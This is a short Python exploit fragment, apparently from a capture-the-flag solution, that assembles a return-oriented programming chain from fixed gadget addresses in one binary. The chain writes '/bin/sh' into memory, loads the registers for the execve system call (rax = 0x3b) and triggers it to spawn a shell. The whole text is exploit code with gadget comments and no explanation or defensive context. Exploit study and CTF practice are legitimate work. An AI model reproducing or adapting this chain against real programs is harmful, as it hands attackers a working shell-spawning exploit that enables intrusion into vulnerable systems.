payload = p64(0x40ee7f)
#0x000000000040ee7f: pop rbx; pop rbp; ret; 
payload += p64(0x68662f6e69622f)+p64(0x493070)+p64(0x45fc7a)
# 0x000000000045fc7a: mov qword ptr [rbp], rbx; pop rbx; pop rbp; pop r12; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x42340b)
# 0x000000000042340b: pop rdi; add al, 0; cmovne rax, rdx; ret; 
payload += p64(0x493070)+p64(0x40f4b2)
# 0x000000000040f4b2: pop rsi; ret; 
payload += p64(0x0)+p64(0x40f011)
# 0x000000000040f011: cmp ecx, edx; mov edx, 0; pop rbx; cmove eax, edx; ret; 
payload += p64(0x0)+p64(0x4532e1)
# 0x00000000004532e1: pop rax; ret; 
payload += p64(0x3b)+p64(0x4040a4)
# 0x00000000004040a4: syscall; 
payload += b''
